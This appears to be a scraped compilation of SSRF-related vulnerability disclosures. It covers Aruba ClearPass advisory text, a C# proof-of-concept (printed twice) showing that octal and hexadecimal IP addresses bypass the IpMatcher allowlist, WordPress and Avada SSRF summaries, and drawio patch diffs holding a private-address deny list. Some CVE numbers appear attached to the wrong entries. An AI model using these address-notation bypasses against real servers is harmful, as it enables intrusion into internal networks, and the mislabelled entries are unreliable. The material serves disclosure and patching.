script code in a victim’s browser in the context of the affected interface. Internal Reference: ATLCP-181 Severity: Medium CVSSv3.x Overall Score: 6.6 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L Discovery: This vulnerability was discovered and reported by the Memorial Hermann Security Team. Improper Handling of Highly Compressed Data (Data Amplification) and Memory Allocation with Excessive Size Value in Python Eventlet Library (CVE-2021-21419) -------------------------------------------------------------------- A vulnerability exists in the Python Eventlet library used by ClearPass Policy Manager. This could allow a WebSocket peer to exhaust memory reserved by Eventlet inside of ClearPass Policy Manager leading to a partial Denial of Service condition in services that use the library. For more details, please refer to https://github.com/advisories/GHSA-9p9m-jm8w-94p2 Internal Reference: ATLCP-158 Severity: Medium CVSSv3.x Overall Score: 5.3 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L Discovery: This vulnerability was discovered by the maintainers of the Eventlet repository on GitHub. Authorization Bypass in ClearPass Policy Manager via Insufficient Session Expiration (CVE-2022-23669) --------------------------------------------------------------------- A vulnerability exists in the handling of SAML token expiration by ClearPass Policy Manager. A successful exploit could allow an attacker in the possession of a valid token to reuse the token after session expiration, thereby achieving a bypass of the normal authorization process. Internal Reference: ATLCP-171 Severity: Medium CVSSv3.x Overall Score: 5.0 CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L Discovery: This vulnerability was discovered and reported by Tomas Rzepka of F-Secure. Authenticated Denial-of-Service Condition in Python Urllib Library Used by ClearPass Policy Manager (CVE-2021-33503) -------------------------------------------------------------------- A vulnerability exists in the Python Urllib library used by ClearPass Policy Manager. An authenticated attacker can exploit this condition via the web-based management interface to create a denial-of-service condition in the interface. For more details, please refer to https://github.com/advisories/GHSA-q2q7-5pp4-w6pg Internal Reference: ATLCP-165 Severity: Medium CVSSv3.x Overall Score: 4.9 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H Discovery: This vulnerability was discovered by Nariyoshi Chida. Authenticated Remote Command Injection in ClearPass Policy Manager Command Line Interface Leading to Partial System Compromise (CVE-2022-23667) --------------------------------------------------------------------- A vulnerability in the ClearPass Policy Manager command line interface allows remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system leading to partial system compromise. Internal Reference: ATLCP-92 Severity: Medium CVSSv3.x Overall Score: 4.7 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L Discovery: This vulnerability was discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Authenticated Server-Side Request Forgery (SSRF) Leading to Information Disclosure (CVE-2022-23668) --------------------------------------------------------------------- A vulnerability in the web-based management interface of ClearPass Policy Manager could allow an unauthenticated remote attacker to conduct a server-side request forgery (SSRF) attack. A successful exploit allows an attacker to enumerate information about the internal structure of the ClearPass Policy Manager host leading to potential disclosure of sensitive information. Internal Reference: ATLCP-124 Severity: Medium CVSSv3.x Overall Score: 4.1 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N Discovery: This vulnerability was discovered and reported by Mohammed F. Al-Barbari (bugcrowd.com/m4dm0e) via Aruba's Bug Bounty Program. Resolution ========== The vulnerabilities contained in this advisory can be addressed by patching or upgrading to one of the ClearPass Policy Manager versions listed below - ClearPass Policy Manager 6.10.x: 6.10.5 and above - ClearPass Policy Manager 6.9.x: 6.9.10 and above - ClearPass Policy Manager 6.8.x: 6.8.9-HF3 and above As a general rule, Aruba does not evaluate or patch ClearPass Policy Manager versions that have reached their End of Support (EoS) milestone. For more information about Aruba's End of Support policy visit: https://www.arubanetworks.com/support-services/end-of-life/ Workaround ========== To minimize the likelihood of an attacker exploiting these vulnerabilities, Aruba recommends that the CLI and web-based management interfaces for ClearPass Policy Manager be restricted to a dedicated layer 2 segment/VLAN and/or controlled by firewall policies at layer 3 and above ClearPass Policy Manager Security Hardening =========================================== For general information on hardening ClearPass Policy Manager instances against security threats please see the ClearPass Policy Manager Hardening Guide available at https://support.hpe.com/hpesc/public/docDisplay?docId=a00091066en\_us for ClearPass Policy Manager 6.9.x and earlier versions. For ClearPass 6.10.x the ClearPass Policy Manager Hardening Guide is available at https://www.arubanetworks.com/techdocs/ClearPass/6.10/PolicyManager/Content/home.htm Exploitation and Public Discussion ================================== Aruba is not aware of any public discussion or exploit code that target these specific vulnerabilities as of the release date of the advisory. Revision History ================ Revision 1 / 2022-May-04 / Initial release Aruba SIRT Security Procedures ============================== Complete information on reporting security vulnerabilities in Aruba Networks products and obtaining assistance with security incidents is available at: https://www.arubanetworks.com/support-services/security-bulletins/ For reporting \*NEW\* Aruba Networks security issues, email can be sent to aruba-sirt(at)hpe.com. For sensitive information we encourage the use of PGP encryption. Our public keys can be found at: https://www.arubanetworks.com/support-services/security-bulletins/ (c) Copyright 2022 by Aruba, a Hewlett Packard Enterprise company. This advisory may be redistributed freely after the release date given at the top of the text, provided that the redistributed copies are complete and unmodified, including all data and version information. -----BEGIN PGP SIGNATURE----- iQFLBAEBCAA1FiEEMd5pP5EnbG7Y0fo5mP4JykWFhtkFAmJpVl4XHHNpcnRAYXJ1 YmFuZXR3b3Jrcy5jb20ACgkQmP4JykWFhtnvWwgAnZmt6eDd2Wn2JScRccrY2gAQ nUHV7MDgqn6FRBBeRho8tpHQFaC73fSafdX9worLEFp1gUltUDDMefzpgonN0DHS ONE/tcYbwMuC6DaszY9S0MuKcdqSS6bisGsELlObi/8wP4cXZiQNEzrP9UUXX0GG OkRKksMg+Z5PuDjHqBaQEWu8f3jO3FX55JLZa5FWZwuGAFpi+UUfOloitYko+XvK /EayQ22dtxC+AUWPtMgxw1K0JwFO5vtqtsCDTctgbdKeomF1kkgw7KPIl3cvX6E+ fcL4KEFnGMXmrXislYFJXwsCWhax/ig7HC407k0U+m7Xx6AqqdmkzRETwgcTJQ== =AuGw -----END PGP SIGNATURE-----

CVE-2022-23666

An Input Validation Vulnerability exists in Joel Christner .NET C# packages WatsonWebserver, IpMatcher 1.0.4.1 and below (IpMatcher) and 4.1.3 and below (WatsonWebserver) due to insufficient validation of input IP addresses and netmasks against the internal Matcher list of IP addresses and subnets.

.NET C# package IpMatcher incorrectly validates input, leading to indeterminate SSRF, LFI, RFI, DoS vectors

A vulnerability in the .NET C# IpMatcher v1.0.4.1 and below NuGet package allows an attacker to submit invalid octal or hexadecimal IP addresses and netmasks, since IpMatcher does not properly validate them against the internal "Matcher" match list of IP addresses and subnets. Further, IpMatcher does not correctly reformat additions to the match list when these additions (IP address or netmask or both) are supplied in octal or hexadecimal notation. A remote, unauthenticated attacker can bypass allowlist or denylist validation based on use of IpMatcher as exemplified by WatsonWebserver, resulting in indeterminate SSRF, LFI, RFI, or DoS.

Patched (researchers notified 19 August) in commit and NuGet package version 1.0.4.2

    /* Author: Kelly Kaoudis
     * License: GPLv3
     *
     * Requires:
     * `dotnet add package IpMatcher --version 1.0.4.1`
     *
     * To run:
     * `dotnet run`
     */
    
    using System;
    using IpMatcher;
    
    namespace dotnet
    {
        class PoC
        {
            private static void checkExists(Matcher matcher, string ip, string mask)
            {
                if (matcher.Exists(ip, mask))
                {
                    Console.WriteLine("matches on " + ip + " / " + mask);
                }
                else
                {
                    Console.WriteLine("DOES NOT match on " + ip + " / " + mask);
                }
            }
    
            private static void checkMatchExists(Matcher matcher, string ip)
            {
                if (matcher.MatchExists(ip))
                {
                    Console.WriteLine("matches on " + ip);
                }
                else
                {
                    Console.WriteLine("DOES NOT match on " + ip);
                }
    
            }
    
            private static void dumpMatcher(Matcher matcher)
            {
                Console.WriteLine("\nWhat is actually in the matcher now (if nothing follows on the next line, nothing)?");
                foreach (string addr in matcher.All())
                {
                    Console.WriteLine("address from matcher: " + addr);
                }
                Console.WriteLine("");
            }
    
            static void Main(string[] args)
            {
                Console.WriteLine("Constructing a new IpMatcher#Matcher...");
                Matcher matcher = new Matcher();
                // nothing in the matcher yet
                dumpMatcher(matcher);
    
                Console.WriteLine("adding 192.31.196.0 / 0.0.0.0 (mask)");
                matcher.Add("192.31.196.0", "0.0.0.0");
    
                // contains 0.0.0.0 / 0.0.0.0 (incorrect)
                dumpMatcher(matcher);
    
                checkExists(matcher, "192.31.196.2", "0.0.0.0");
                checkExists(matcher, "192.31.196.1", "0.0.0.0");
                checkExists(matcher, "192.31.196.0", "0.0.0.0"); // should match but does not
                checkExists(matcher, "0.0.0.0", "255.0.0.0"); //should not match
                checkExists(matcher, "0.0.0.0", "0.0.0.0");
    
                checkMatchExists(matcher, "0.0.0.0");
                checkMatchExists(matcher, "192.31.196.0");
                checkMatchExists(matcher, "192.31.196.1");
                //checkMatchExists(matcher, "0192.031.0196.0"); throws parse exception and not sure why
                checkMatchExists(matcher, "0300.037.0304.0"); // octal for 192.31.196.0
                checkMatchExists(matcher, "0300.037.0304.01");
                checkMatchExists(matcher, "0300.036.0304.0"); // should not match but does
                checkMatchExists(matcher, "0100.0100.0100.0100"); // should not match but does
    
            //    checkMatchExists(matcher, "aaaaaaaaaa"); thankfully results in exception
    
                // results in invalid argument exception
               // if (matcher.MatchExists("0192.031.0196.02"))
               // {
               //     Console.WriteLine("gross! matches 0192.031.0196.02");
               // }
    
                Console.WriteLine("adding 192.168.0.0 / 255.0.0.0 (mask)");
                matcher.Add("192.168.0.0", "255.0.0.0");
    
                checkExists(matcher, "192.167.0.1", "255.0.0.0");
                checkExists(matcher, "192.168.0.0", "255.0.0.0");
                checkExists(matcher, "192.168.1.1", "255.0.0.0");
                checkMatchExists(matcher, "172.13.2.15");
                checkMatchExists(matcher, "010.1.1.1");
                checkMatchExists(matcher, "4.4.4.4");
    
                Console.WriteLine("adding 0300.055.0250.0 / 1.1.0.0 (mask)");
                matcher.Add("0300.055.0250.0", "1.1.0.0");
    
                checkExists(matcher, "192.45.168.0", "1.1.0.0");
                checkExists(matcher, "0300.055.0250.0", "0.0.0.0");
                checkExists(matcher, "0300.055.0250.0300", "1.1.0.0");
                checkExists(matcher, "0288.055.0250.0", "1.1.0.0");
    
                checkMatchExists(matcher, "2130706433");
                checkMatchExists(matcher, "017700000001");
                checkMatchExists(matcher, "3232235521");
                checkMatchExists(matcher, "3232235777");
                checkMatchExists(matcher, "0x7f.0x00.0x00.0x01");
                checkMatchExists(matcher, "0xc0.0xa8.0x00.0x14");
    
                Console.WriteLine("adding 0300.055.0250.0 / 0377.0.0.0 (mask)");
                matcher.Add("0300.055.0250.0", "0377.0.0.0");
    
                Console.WriteLine("adding 0250.0300.010.010 / 0.0.0.0 (mask)");
                matcher.Add("0250.0300.010.010", "0.0.0.0");
    
                Console.WriteLine("adding 0250.0300.010.010 / 010.010.010.0 (mask)");
                matcher.Add("0250.0300.010.010", "010.010.010.0");
    
                // anything ending in 8 or 9 doesn't work
                Console.WriteLine("adding 0172.057.0.0 / 0.0.0.0 (mask)");
                matcher.Add("0172.057.0.0", "0.0.0.0");
    
                Console.WriteLine("adding 0172.057.0.0 / 055.055.013.0 (mask)");
                matcher.Add("0172.057.0.0", "055.055.013.0");
    
             //   matcher.Add("08.09.0.0", "01.01.01.0"); fails as it should
    
                Console.WriteLine("adding 010.010.0172.0 / 0.0.0.0 (mask)");
                matcher.Add("010.010.0172.0", "0.0.0.0");
    
                Console.WriteLine("adding 010.010.0172.0 / 01.01.01.01 (mask)");
                matcher.Add("010.010.0172.0", "01.01.01.01");
    
                Console.WriteLine("adding 010.010.0172.0 / 010.010.0172.010 (mask)");
                matcher.Add("010.010.0172.0", "010.010.0172.010");
    
                Console.WriteLine("adding 010.010.0172.0 / 010.010.0.010 (mask)");
                matcher.Add("010.010.0172.0", "010.010.0.010");
    
                Console.WriteLine("adding 010.010.0172.0 / 010.010.0.010 (mask)");
                matcher.Add("010.010.0172.0", "010.010.0255.010");
    
                Console.WriteLine("adding 0xaa.0xaa.0xaa.0xaa / 0xaa.0xfe.0xfe.0xfe (mask)");
                matcher.Add("0xaa.0xaa.0xaa.0xaa", "0xfe.0xfe.0xfe.0xfe");
    
              //  fails with exception as it should as 0xfff is tooooo biggggg
              //  matcher.Add("0xfff.0xfff.0xfff.0x0", "0x0.0x0.0x0.0x0");
    
                Console.WriteLine("adding 0xf0.0x0.0x0.0x0 / 0xff.0x0.0x0.0x0 (mask)");
                matcher.Add("0xf0.0x0.0x0.0x0", "0xff.0x0.0x0.0x0");
    
                // now contains the following:
                // 0.0.0.0/0.0.0.0
                // 192.0.0.0/255.0.0.0
                // 0.1.0.0/1.1.0.0
                // 192.0.0.0/0377.0.0.0
                // 8.0.8.0/010.010.010.0
                // 40.45.0.0/055.055.013.0
                // 8.8.122.0/010.010.0172.010
                // 8.8.0.0/010.010.0.010
                // 8.8.40.0/010.010.0255.010
                // 170.170.170.170/0xfe.0xfe.0xfe.0xfe
                // 240.0.0.0/0xff.0x0.0x0.0x0
                dumpMatcher(matcher);
            }
        }
    }

CVE-2021-33318: advisories/0-2021.md at main · kaoudis/advisories

The External Media without Import WordPress plugin through 1.1.2 does not have any authorisation and does to ensure that medias added via URLs are external medias, which could allow any authenticated users, such as subscriber to perform blind SSRF attacks

CVE-2022-1398

The Fusion Builder WordPress plugin before 3.6.2, used in the Avada theme, does not validate a parameter in its forms which could be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. This could be used to interact with hosts on the server's local network bypassing firewalls and access control measures.

Skip to content

*   Penetration Testing
*   Prism
*   Why Prism?
*   Partners
    *   Service Provider Partners
    *   Penetration Testing Partners
*   Resources
    *   Tech Talks
    *   Blog
    *   Our Customers

*   Penetration Testing
*   Prism
*   Why Prism?
*   Partners
    *   Service Provider Partners
    *   Penetration Testing Partners
*   Resources
    *   Tech Talks
    *   Blog
    *   Our Customers

**Rootshell Discovered a Critical Vulnerability in Top WordPress Theme**

Rootshell Discovered a Critical Vulnerability in Top WordPress Theme

The Rootshell team discovered a critical vulnerability within Avada, the number one best-selling theme on WordPress.

Rootshell Security Consultant, Calum Elrick, identified a Server-Side Request Forgery (SSRF) issue by manipulating a parameter in the theme’s prebuilt contact form builders.

SSRF is a vulnerability that allows threat actors to create requests from the vulnerable server and access private IP addresses on the server’s local network.

This enables threat actors to target internal systems behind firewalls that are normally inaccessible, as well as access services from the same server that is listening on the loopback interface.

In summary, Server-Side Request Forgery attacks make it possible to:

*   Scan and attack systems from the internal network that are not normally accessible
*   Enumerate and attack services that are running on these hosts
*   Exploit host-based authentication services

On discovery of the issue, the Rootshell team quickly took action, and responsibly disclosed the vulnerability to Theme Fusion, the creators of Avada.

Theme Fusion addressed the issue promptly, and a patch has now been added in versions 7.6.2 (security update) and 7.7.

More details, including proof-of-concept code, will be available on our blog soon.

**This vulnerability affects Avada version 7.6.1 and below. We advise Avada users to update their version to the latest patch,** **available here****.**

**Share This Story, Choose Your Platform!**

**Related Posts**

*   Penetration Testing as a Service
*   Web Application Penetration Testing
*   Cloud Penetration Testing
*   Mobile Application Testing
*   Red Team as a Service
*   Cyber Threat Intelligence
*   Managed Vulnerability Scanning
*   Phishing Assessments

*   Prism Platform
*   Prism Plus+
*   Prism Features
*   Request a Demo

*   Tech Talks
*   Blog
*   Our Customers

*   Service Provider Partners
*   Penetration Testing Partners
*   About Us
*   Accreditations
*   Careers

© Copyright 2022 | Rootshell Security

Page load link

We use cookies on our website to give you the most relevant experience by remembering your preferences and repeat visits. By clicking “Accept All”, you consent to the use of ALL the cookies.

**Privacy Overview**

This website uses cookies to improve your experience while you navigate through the website. Out of these, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may affect your browsing experience.

Necessary cookies are absolutely essential for the website to function properly. These cookies ensure basic functionalities and security features of the website, anonymously.

Cookie

Duration

Description

cookielawinfo-checkbox-analytics

11 months

This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".

cookielawinfo-checkbox-functional

11 months

The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".

cookielawinfo-checkbox-necessary

11 months

This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".

cookielawinfo-checkbox-others

11 months

This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.

cookielawinfo-checkbox-performance

11 months

This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".

viewed\_cookie\_policy

11 months

The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.

Functional cookies help to perform certain functionalities like sharing the content of the website on social media platforms, collect feedbacks, and other third-party features.

Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.

Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics the number of visitors, bounce rate, traffic source, etc.

Advertisement cookies are used to provide visitors with relevant ads and marketing campaigns. These cookies track visitors across websites and collect information to provide customized ads.

Other uncategorized cookies are those that are being analyzed and have not been classified into a category as yet.

CVE-2022-1386: Rootshell Discovered a Critical Vulnerability in Top WordPress Theme

SSRF on /proxy in GitHub repository jgraph/drawio prior to 18.0.4. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.

@@ -15,6 +15,7 @@ import java.net.URL; import java.net.URLConnection; import java.net.UnknownHostException; import java.net.InetAddress; import java.util.logging.Level; import java.util.logging.Logger;  
@@ -245,42 +246,51 @@ public boolean checkUrlParameter(String url) { URL parsedUrl = new URL(url); String protocol = parsedUrl.getProtocol(); String host = parsedUrl.getHost().toLowerCase(); String host = parsedUrl.getHost(); InetAddress address = InetAddress.getByName(host); String hostAddress = address.getHostAddress(); host = host.toLowerCase();  
return (protocol.equals("http") || protocol.equals("https")) && !host.endsWith(".internal") && !host.endsWith(".local") && !host.contains("localhost") && !host.startsWith("0.") // 0.0.0.0/8 && !host.startsWith("10.") // 10.0.0.0/8 && !host.startsWith("127.") // 127.0.0.0/8 && !host.startsWith("169.254.") // 169.254.0.0/16 && !host.startsWith("172.16.") // 172.16.0.0/12 && !host.startsWith("172.17.") // 172.16.0.0/12 && !host.startsWith("172.18.") // 172.16.0.0/12 && !host.startsWith("172.19.") // 172.16.0.0/12 && !host.startsWith("172.20.") // 172.16.0.0/12 && !host.startsWith("172.21.") // 172.16.0.0/12 && !host.startsWith("172.22.") // 172.16.0.0/12 && !host.startsWith("172.23.") // 172.16.0.0/12 && !host.startsWith("172.24.") // 172.16.0.0/12 && !host.startsWith("172.25.") // 172.16.0.0/12 && !host.startsWith("172.26.") // 172.16.0.0/12 && !host.startsWith("172.27.") // 172.16.0.0/12 && !host.startsWith("172.28.") // 172.16.0.0/12 && !host.startsWith("172.29.") // 172.16.0.0/12 && !host.startsWith("172.30.") // 172.16.0.0/12 && !host.startsWith("172.31.") // 172.16.0.0/12 && !host.startsWith("192.0.0.") // 192.0.0.0/24 && !host.startsWith("192.168.") // 192.168.0.0/16 && !host.startsWith("198.18.") // 198.18.0.0/15 && !host.startsWith("198.19.") // 198.18.0.0/15 && !address.isAnyLocalAddress() && !address.isLoopbackAddress() && !host.endsWith(".internal") // Redundant && !host.endsWith(".local") // Redundant && !host.contains("localhost") // Redundant && !hostAddress.startsWith("0.") // 0.0.0.0/8 && !hostAddress.startsWith("10.") // 10.0.0.0/8 && !hostAddress.startsWith("127.") // 127.0.0.0/8 && !hostAddress.startsWith("169.254.") // 169.254.0.0/16 && !hostAddress.startsWith("172.16.") // 172.16.0.0/12 && !hostAddress.startsWith("172.17.") // 172.16.0.0/12 && !hostAddress.startsWith("172.18.") // 172.16.0.0/12 && !hostAddress.startsWith("172.19.") // 172.16.0.0/12 && !hostAddress.startsWith("172.20.") // 172.16.0.0/12 && !hostAddress.startsWith("172.21.") // 172.16.0.0/12 && !hostAddress.startsWith("172.22.") // 172.16.0.0/12 && !hostAddress.startsWith("172.23.") // 172.16.0.0/12 && !hostAddress.startsWith("172.24.") // 172.16.0.0/12 && !hostAddress.startsWith("172.25.") // 172.16.0.0/12 && !hostAddress.startsWith("172.26.") // 172.16.0.0/12 && !hostAddress.startsWith("172.27.") // 172.16.0.0/12 && !hostAddress.startsWith("172.28.") // 172.16.0.0/12 && !hostAddress.startsWith("172.29.") // 172.16.0.0/12 && !hostAddress.startsWith("172.30.") // 172.16.0.0/12 && !hostAddress.startsWith("172.31.") // 172.16.0.0/12 && !hostAddress.startsWith("192.0.0.") // 192.0.0.0/24 && !hostAddress.startsWith("192.168.") // 192.168.0.0/16 && !hostAddress.startsWith("198.18.") // 198.18.0.0/15 && !hostAddress.startsWith("198.19.") // 198.18.0.0/15 && !host.endsWith(".arpa"); // reverse domain (needed?) } catch (MalformedURLException e) { return false; } catch (UnknownHostException e) { return false; } } else {

CVE-2022-1713: 18.0.3 release · jgraph/drawio@283d41e

SSRF in editor's proxy via IPv6 link-local address in GitHub repository jgraph/drawio prior to 18.0.5. SSRF to internal link-local IPv6 addresses

Permalink

Browse files

Adds isLinkLocalAddress() to address checks

*   Loading branch information

1 parent 4deecee commit cf5c78aa0f3127fb10053db55b39f3017a0654ae

Showing with **1 addition** and **0 deletions**.

1.  +1 −0 src/main/java/com/mxgraph/online/ProxyServlet.java

@@ -254,6 +254,7 @@ public boolean checkUrlParameter(String url)

return (protocol.equals("http") || protocol.equals("https"))

&& !address.isAnyLocalAddress()

&& !address.isLoopbackAddress()

&& !address.isLinkLocalAddress()

&& !host.endsWith(".internal") // Redundant

&& !host.endsWith(".local") // Redundant

&& !host.contains("localhost") // Redundant

**0 comments on commit cf5c78a**

Please sign in to comment.

CVE-2022-1722: Adds isLinkLocalAddress() to address checks · jgraph/drawio@cf5c78a

IpMatcher versions 1.0.4.1 and below for .NET Core 2.0 and .NET Framework 4.5.2 incorrectly validates octal and hexadecimal input data which can lead to indeterminate server-side request forgery, local file inclusion, remote file inclusion, and denial of service vectors.

    # Exploit Title: SSRF in .NET C# IpMatcher v1.0.4.1 and below NuGet package: CVE-2021-33318 IpMatcher v1.0.4.1 and below for .NET Core 2.0 and .NET Framework 4.5.2. incorrectly validates octal & hexadecimal input data, leading to indeterminate SSRF, LFI, RFI, and DoS vectors.# Date: 22/09/2022# Exploit Author: Kelly Kaoudis & Sick Codes# Vendor Homepage: https://www.nuget.org/packages/IpMatcher/1.0.4.2# Version: 1.0.4.1 and below# Tested on: macOS, Linux, Windows# CVE: CVE-2021-33318# Reference: https://github.com/kaoudis/advisories/blob/main/0-2021.md# Reference: https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-060.md/* Author: Kelly Kaoudis* License: GPLv3** Requires:* `dotnet add package IpMatcher --version 1.0.4.1`** To run:* `dotnet run`*/using System;using IpMatcher;namespace dotnet{    class PoC    {        private static void checkExists(Matcher matcher, string ip, string mask)        {            if (matcher.Exists(ip, mask))            {                Console.WriteLine("matches on " + ip + " / " + mask);            }            else            {                Console.WriteLine("DOES NOT match on " + ip + " / " + mask);            }        }        private static void checkMatchExists(Matcher matcher, string ip)        {            if (matcher.MatchExists(ip))            {                Console.WriteLine("matches on " + ip);            }            else            {                Console.WriteLine("DOES NOT match on " + ip);            }        }        private static void dumpMatcher(Matcher matcher)        {            Console.WriteLine("\nWhat is actually in the matcher now (if nothing follows on the next line, nothing)?");            foreach (string addr in matcher.All())            {                Console.WriteLine("address from matcher: " + addr);            }            Console.WriteLine("");        }        static void Main(string[] args)        {            Console.WriteLine("Constructing a new IpMatcher#Matcher...");            Matcher matcher = new Matcher();            // nothing in the matcher yet            dumpMatcher(matcher);            Console.WriteLine("adding 192.31.196.0 / 0.0.0.0 (mask)");            matcher.Add("192.31.196.0", "0.0.0.0");            // contains 0.0.0.0 / 0.0.0.0 (incorrect)            dumpMatcher(matcher);            checkExists(matcher, "192.31.196.2", "0.0.0.0");            checkExists(matcher, "192.31.196.1", "0.0.0.0");            checkExists(matcher, "192.31.196.0", "0.0.0.0"); // should match but does not            checkExists(matcher, "0.0.0.0", "255.0.0.0"); //should not match            checkExists(matcher, "0.0.0.0", "0.0.0.0");            checkMatchExists(matcher, "0.0.0.0");            checkMatchExists(matcher, "192.31.196.0");            checkMatchExists(matcher, "192.31.196.1");            //checkMatchExists(matcher, "0192.031.0196.0"); throws parse exception and not sure why            checkMatchExists(matcher, "0300.037.0304.0"); // octal for 192.31.196.0            checkMatchExists(matcher, "0300.037.0304.01");            checkMatchExists(matcher, "0300.036.0304.0"); // should not match but does            checkMatchExists(matcher, "0100.0100.0100.0100"); // should not match but does        //    checkMatchExists(matcher, "aaaaaaaaaa"); thankfully results in exception            // results in invalid argument exception           // if (matcher.MatchExists("0192.031.0196.02"))           // {           //     Console.WriteLine("gross! matches 0192.031.0196.02");           // }            Console.WriteLine("adding 192.168.0.0 / 255.0.0.0 (mask)");            matcher.Add("192.168.0.0", "255.0.0.0");            checkExists(matcher, "192.167.0.1", "255.0.0.0");            checkExists(matcher, "192.168.0.0", "255.0.0.0");            checkExists(matcher, "192.168.1.1", "255.0.0.0");            checkMatchExists(matcher, "172.13.2.15");            checkMatchExists(matcher, "010.1.1.1");            checkMatchExists(matcher, "4.4.4.4");            Console.WriteLine("adding 0300.055.0250.0 / 1.1.0.0 (mask)");            matcher.Add("0300.055.0250.0", "1.1.0.0");            checkExists(matcher, "192.45.168.0", "1.1.0.0");            checkExists(matcher, "0300.055.0250.0", "0.0.0.0");            checkExists(matcher, "0300.055.0250.0300", "1.1.0.0");            checkExists(matcher, "0288.055.0250.0", "1.1.0.0");            checkMatchExists(matcher, "2130706433");            checkMatchExists(matcher, "017700000001");            checkMatchExists(matcher, "3232235521");            checkMatchExists(matcher, "3232235777");            checkMatchExists(matcher, "0x7f.0x00.0x00.0x01");            checkMatchExists(matcher, "0xc0.0xa8.0x00.0x14");            Console.WriteLine("adding 0300.055.0250.0 / 0377.0.0.0 (mask)");            matcher.Add("0300.055.0250.0", "0377.0.0.0");            Console.WriteLine("adding 0250.0300.010.010 / 0.0.0.0 (mask)");            matcher.Add("0250.0300.010.010", "0.0.0.0");            Console.WriteLine("adding 0250.0300.010.010 / 010.010.010.0 (mask)");            matcher.Add("0250.0300.010.010", "010.010.010.0");            // anything ending in 8 or 9 doesn't work            Console.WriteLine("adding 0172.057.0.0 / 0.0.0.0 (mask)");            matcher.Add("0172.057.0.0", "0.0.0.0");            Console.WriteLine("adding 0172.057.0.0 / 055.055.013.0 (mask)");            matcher.Add("0172.057.0.0", "055.055.013.0");         //   matcher.Add("08.09.0.0", "01.01.01.0"); fails as it should            Console.WriteLine("adding 010.010.0172.0 / 0.0.0.0 (mask)");            matcher.Add("010.010.0172.0", "0.0.0.0");            Console.WriteLine("adding 010.010.0172.0 / 01.01.01.01 (mask)");            matcher.Add("010.010.0172.0", "01.01.01.01");            Console.WriteLine("adding 010.010.0172.0 / 010.010.0172.010 (mask)");            matcher.Add("010.010.0172.0", "010.010.0172.010");            Console.WriteLine("adding 010.010.0172.0 / 010.010.0.010 (mask)");            matcher.Add("010.010.0172.0", "010.010.0.010");            Console.WriteLine("adding 010.010.0172.0 / 010.010.0.010 (mask)");            matcher.Add("010.010.0172.0", "010.010.0255.010");            Console.WriteLine("adding 0xaa.0xaa.0xaa.0xaa / 0xaa.0xfe.0xfe.0xfe (mask)");            matcher.Add("0xaa.0xaa.0xaa.0xaa", "0xfe.0xfe.0xfe.0xfe");          //  fails with exception as it should as 0xfff is tooooo biggggg          //  matcher.Add("0xfff.0xfff.0xfff.0x0", "0x0.0x0.0x0.0x0");            Console.WriteLine("adding 0xf0.0x0.0x0.0x0 / 0xff.0x0.0x0.0x0 (mask)");            matcher.Add("0xf0.0x0.0x0.0x0", "0xff.0x0.0x0.0x0");            // now contains the following:            // 0.0.0.0/0.0.0.0            // 192.0.0.0/255.0.0.0            // 0.1.0.0/1.1.0.0            // 192.0.0.0/0377.0.0.0            // 8.0.8.0/010.010.010.0            // 40.45.0.0/055.055.013.0            // 8.8.122.0/010.010.0172.010            // 8.8.0.0/010.010.0.010            // 8.8.40.0/010.010.0255.010            // 170.170.170.170/0xfe.0xfe.0xfe.0xfe            // 240.0.0.0/0xff.0x0.0x0.0x0            dumpMatcher(matcher);        }    }}

Tag

#ssrf